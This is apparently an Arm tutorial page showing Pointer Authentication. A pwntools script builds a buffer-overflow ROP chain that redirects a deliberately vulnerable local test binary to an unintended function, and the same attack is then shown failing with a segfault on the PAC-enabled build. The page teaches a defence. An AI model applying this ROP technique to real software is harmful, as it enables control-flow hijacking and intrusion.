# Exploit applications built without Pointer Authentication instructions

## In this learning path

- [Introduction](https://learn.arm.com/learning-paths/servers-and-cloud-computing/pac/)
- [Pointer Authentication on Arm](https://learn.arm.com/learning-paths/servers-and-cloud-computing/pac/pac/)
- [Example application](https://learn.arm.com/learning-paths/servers-and-cloud-computing/pac/example/)
- [Exploit applications built without Pointer Authentication instructions](https://learn.arm.com/learning-paths/servers-and-cloud-computing/pac/exploit/)
- [Next Steps](https://learn.arm.com/learning-paths/servers-and-cloud-computing/pac/_next-steps/)

## Prerequisites
Install [pwntools](https://github.com/Gallopsled/pwntools) and its dependencies. You will use this exploit development library to demonstrate how you can exploit the application built in the previous section without pointer authentication.

```
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev -y
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools
```

## Exploit the application
Create `exploit.py` with the following to attack the `main_nopac` application, and cause `func2()` to be executed.

```
#!/usr/bin/env python3

from pwn import *

context(os='linux', arch='aarch64')

binary = ELF('./main_nopac')

rop = ROP(binary)

padding = b'A' * 24

rop.call(binary.symbols['func2'])  # return to func2

print(rop.gadgets)
log.info("ROP chain:\n" + rop.dump())

print(rop.chain())
data = padding + rop.chain()
print(data)
data = data.replace(b'\0', b'')

print(data)
r = process(['./main_nopac', data])

r.interactive()
```

If necessary, make the script executable.

```
chmod +x ./exploit.py
```

## Run exploit.py on main_nopac
Run the script which exploits `main_nopac`:

```
./exploit.py
```

Which should result output similar to the following:

```
__output__
[*] '/home/ubuntu/pac/main_nopac'
__output__
    Arch:     aarch64-64-little
__output__
    RELRO:    Partial RELRO
__output__
    Stack:    Canary found
__output__
    NX:       NX enabled
__output__
    PIE:      No PIE (0x400000)
__output__
[*] Loading gadgets for '/home/ubuntu/pac/main_nopac'
__output__
{4194964: Gadget(0x400294, ['ret'], [], 0x8), 4257924: Gadget(0x40f884, ['ret', 'ret'], [], 0x10)}
__output__
[*] ROP chain:
__output__
    0x0000:         0x4006f8 0x4006f8()
__output__
b'\xf8\x06@\x00\x00\x00\x00\x00'
__output__
b'AAAAAAAAAAAAAAAAAAAAAAAA\xf8\x06@\x00\x00\x00\x00\x00'
__output__
b'AAAAAAAAAAAAAAAAAAAAAAAA\xf8\x06@'
__output__
[+] Starting local process './main_nopac': pid 4585
__output__
[*] Switching to interactive mode
__output__
Hello World!
__output__
Hello from func2!
__output__
$
```

You have successfully altered execution flow of the program and jumped to address `0x4006f8` (`func2`).

You will be in an interactive shell prompt whilst still inside the application:

```
__output__
$ ls
__output__
Makefile  exploit.py  main.c  main_nopac  main_pac
__output__
$
```

Use `Ctrl+C` to exit the shell, and hence the `main_nopac` application.

```
__output__
[*] Interrupted
__output__
[*] Stopped process './main_nopac' (pid 4618)
```

## Attempt to exploit main_pac
Replace the arguments in the script using `sed`. This saves a new file `exploit_pac.py`:

```
sed 's/main_nopac/main_pac/g' exploit.py > exploit_pac.py
chmod +x exploit_pac.py
```

Now execute `exploit_pac.py`:

```
./exploit_pac.py
```

The script attempts the same attack:

```
__output__
[*] '/home/ubuntu/pac/main_pac'
__output__
    Arch:     aarch64-64-little
__output__
    RELRO:    Partial RELRO
__output__
    Stack:    Canary found
__output__
    NX:       NX enabled
__output__
    PIE:      No PIE (0x400000)
__output__
[*] Loading gadgets for '/home/ubuntu/pac/main_pac'
__output__
{4194964: Gadget(0x400294, ['ret'], [], 0x8), 4257988: Gadget(0x40f8c4, ['ret', 'ret'], [], 0x10)}
__output__
[*] ROP chain:
__output__
    0x0000:         0x4006fc 0x4006fc()
__output__
b'\xfc\x06@\x00\x00\x00\x00\x00'
__output__
b'AAAAAAAAAAAAAAAAAAAAAAAA\xfc\x06@\x00\x00\x00\x00\x00'
__output__
b'AAAAAAAAAAAAAAAAAAAAAAAA\xfc\x06@'
__output__
[+] Starting local process './main_pac': pid 4605
__output__
[*] Switching to interactive mode
__output__
Hello World!
__output__
[*] Got EOF while reading in interactive
__output__
$
```

When you attempt to use the shell prompt you generate a `SIGSEGV` exception instead, and the application terminates.

```
__output__
$ ls
__output__
[*] Process './main_pac' stopped with exit code -11 (SIGSEGV) (pid 4605)
__output__
[*] Got EOF while sending in interactive
```

This demonstrates how the Armv8.3-A Pointer Authentication feature provides protection against software attacks.
